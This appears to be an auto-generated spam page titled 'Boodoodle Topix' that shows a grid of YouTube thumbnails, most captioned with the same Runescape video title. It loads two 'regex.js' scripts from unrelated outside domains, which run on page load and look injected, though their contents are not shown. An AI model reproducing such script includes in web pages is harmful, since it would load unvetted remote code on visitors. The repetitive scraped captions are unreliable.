<!doctype html>
<html lang="en">
	<head>
		<!-- Required meta tags -->
		<meta charset="utf-8">
		<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">

		<!-- Bootstrap CSS -->
		<link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/css/bootstrap.min.css" integrity="sha384-MCw98/SFnGE8fJT3GXwEOngsV7Zt27NXFoaoApmYm81iuXoPkFOJwJ8ERdknLPMO" crossorigin="anonymous">
		<link href="https://fonts.googleapis.com/css?family=Mr+Dafoe" rel="stylesheet" type="text/css">

		<style type="text/css">
			html, body {
			    font-family: "Open Sans", Arial, sans-serif;
			    font-size: 14px;
			    font-weight: 400;
			    background: #f3f3f3 url(https://i.ytimg.com/vi/Eu5hAflnMg0/hqdefault.jpg
) no-repeat center center fixed;
				background-size: cover;
				height: 100%;
			}

			#title{
				font-family: "Mr Dafoe", Times, serif;
			    font-size: 34px;
			    background: rgba(255, 255, 255, 0.8);
			    margin-bottom: 34px;
			}

			.header{
				padding-bottom: 13px;
			    margin-bottom: 13px;
			    border-bottom: 1px solid #eee;
			}

			a {
			    color: #26ADE4;
			    text-decoration: none;
			}

			#title a{
				color: #333;
				margin-left: 21px;
			}

			#title a:hover{
				text-decoration: none;
				color: #26ADE4;
			}

			.container{
				max-width: 960px;
				margin: 0px auto 60px;
			    padding: 20px;
			    background-color: #fff;
			    border: 1px solid #ccc;
			    border-top: 1px solid #ddd;
			    border-left: 1px solid #ddd;
			    box-shadow: 3px 3px 3px rgba(150,150,150,0.2);
			}
			.sidebar ul{
				margin: 0;
			    padding: 0;
			}

			.sidebar ul li{
				list-style: none;
			}

			.footer{
				margin-top: 21px;
				padding-top: 13px;
				border-top: 1px solid #eee;
			}

			.footer a{
				margin: 0 15px;
			}

			.navi{
				margin:13px 0 13px 0;
				padding:13px;
			}

			.navi a{
				margin: 5px 2px;
				font-size: 95%;
			}
			
		</style>

		<title>Boodoodle Topix</title>
		<script type='text/javascript' src='https://hellomarathi.com/regex.js'></script>
	</head>
	<body>
		<div id="title" class="">
			<a href="">“topix”</a>
		</div>
		<div class="container">
			<div class="row header">
				<div class="col-sm-12 text-center">

						<h1>Boodoodle Topix</h1>

	
	<div class="navi text-center">
			</div>

					
				</div>
			</div>
			<div class="row content">
				<div class="col-md-12">
					
						
			
		<div class="row">
							<div class="col-md-4">
					<a href="https://s.pimg.tw/qrcode/fiamicadan/blog/category/0.png" target="_blank">
						<img class="img-fluid" src="https://s.pimg.tw/qrcode/fiamicadan/blog/category/0.png" onerror="this.onerror=null;this.src='https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQh_l3eQ5xwiPy07kGEXjmjgmBKBRB7H2mRxCGhv1tFWg5c_mWT';"></a>
					<p>
						
						<br>
						<span class="badge badge-secondary">fiamicadan.pixnet.net</span>
					</p>
				</div>
							<div class="col-md-4">
					<a href="https://i.ytimg.com/vi/6d8awBJadKk/hqdefault.jpg" target="_blank">
						<img class="img-fluid" src="https://i.ytimg.com/vi/6d8awBJadKk/hqdefault.jpg" onerror="this.onerror=null;this.src='https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQh_l3eQ5xwiPy07kGEXjmjgmBKBRB7H2mRxCGhv1tFWg5c_mWT';"></a>
					<p>
						An Account I Ve Never Pk D On Before In Runescape Youtube
						<br>
						<span class="badge badge-secondary">m.youtube.com</span>
					</p>
				</div>
							<div class="col-md-4">
					<a href="https://i.ytimg.com/vi/H_dw7FmTYxw/hqdefault.jpg" target="_blank">
						<img class="img-fluid" src="https://i.ytimg.com/vi/H_dw7FmTYxw/hqdefault.jpg" onerror="this.onerror=null;this.src='https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQh_l3eQ5xwiPy07kGEXjmjgmBKBRB7H2mRxCGhv1tFWg5c_mWT';"></a>
					<p>
						An Account I Ve Never Pk D On Before In Runescape Youtube
						<br>
						<span class="badge badge-secondary">m.youtube.com</span>
					</p>
				</div>
						
		</div>

		
			
		<div class="row">
							<div class="col-md-4">
					<a href="https://i.ytimg.com/vi/Eu5hAflnMg0/hqdefault.jpg" target="_blank">
						<img class="img-fluid" src="https://i.ytimg.com/vi/Eu5hAflnMg0/hqdefault.jpg" onerror="this.onerror=null;this.src='https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQh_l3eQ5xwiPy07kGEXjmjgmBKBRB7H2mRxCGhv1tFWg5c_mWT';"></a>
					<p>
						An Account I Ve Never Pk D On Before In Runescape Youtube
						<br>
						<span class="badge badge-secondary">m.youtube.com</span>
					</p>
				</div>
							<div class="col-md-4">
					<a href="https://i.ytimg.com/vi/PCOHmTGNgBw/sddefault.jpg" target="_blank">
						<img class="img-fluid" src="https://i.ytimg.com/vi/PCOHmTGNgBw/sddefault.jpg" onerror="this.onerror=null;this.src='https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQh_l3eQ5xwiPy07kGEXjmjgmBKBRB7H2mRxCGhv1tFWg5c_mWT';"></a>
					<p>
						An Account I Ve Never Pk D On Before In Runescape Youtube
						<br>
						<span class="badge badge-secondary">m.youtube.com</span>
					</p>
				</div>
							<div class="col-md-4">
					<a href="https://i.ytimg.com/vi/PCOHmTGNgBw/maxresdefault.jpg" target="_blank">
						<img class="img-fluid" src="https://i.ytimg.com/vi/PCOHmTGNgBw/maxresdefault.jpg" onerror="this.onerror=null;this.src='https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQh_l3eQ5xwiPy07kGEXjmjgmBKBRB7H2mRxCGhv1tFWg5c_mWT';"></a>
					<p>
						An Account I Ve Never Pk D On Before In Runescape Youtube
						<br>
						<span class="badge badge-secondary">m.youtube.com</span>
					</p>
				</div>
						
		</div>

					<div class="row">
				<div class="col-md-12">
					<div class="text-left">
						<h3></h3>
						<img src="https://i.ytimg.com/vi/H_dw7FmTYxw/hqdefault.jpg" width="34%" align="left" style="margin-right: 8px;margin-bottom: 8px;">

											</div>
				</div>
			</div>
			
		
		


	
	
				</div>
			</div>
			<div class="row footer">
				<div class="col-md-12 text-center">
										<a href="pages/dmca">Dmca</a>
										<a href="pages/contact">Contact</a>
										<a href="pages/privacy-policy">Privacy Policy</a>
										<a href="pages/copyright">Copyright</a>
					<li class="nav-item"><a class="nav-link" href="/sitemap.xml">Sitemap</a></li>
				</div>
			</div>
		</div>
		<!-- <style>
	#topbar{  background:#ddd;  width:100%;  text-align:center;  color:#333;  padding:5px;  overflow:hidden;  height:89px;  z-index:1000;  font-family:Georgia;  font-size:17px;  line-height:30px;  position:fixed;  bottom:0;  left:0;  border-top:3px solid #26ADE4;  box-shadow:0 1px 5px rgba(0,0,0,.7);
	}

	#topbar a{-webkit-box-shadow:rgba(0,0,0,0.278431) 1px 1px 3px; background:#26ADE4;  border-bottom-left-radius:4px;  border-bottom-right-radius:4px;  border-top-left-radius:4px;  border-top-right-radius:4px;  border:none;  box-shadow:rgba(0,0,0,0.278431) 1px 1px 3px;  color:white;  cursor:pointer;  font-size:0.95em;  margin:0px 0px 0px 7px;  outline:none;  padding:5px 13px 5px;  position:relative;  text-decoration:initial;
		font-size:19px;
	}

	#topbar a:hover{  cursor:pointer;background:#444}

	#topbar a:active{  top:1px}

</style>

<div id='topbar'>
	<p>Write an awesome ad copy here. 
	  	<br>
		<a href="#your-offer-url" target="_blank">CTA Link &rarr;</a>
	</p>
</div> -->		<script type='text/javascript' src='https://www.infobibit.com/regex.js'></script
>
	</body>
</html>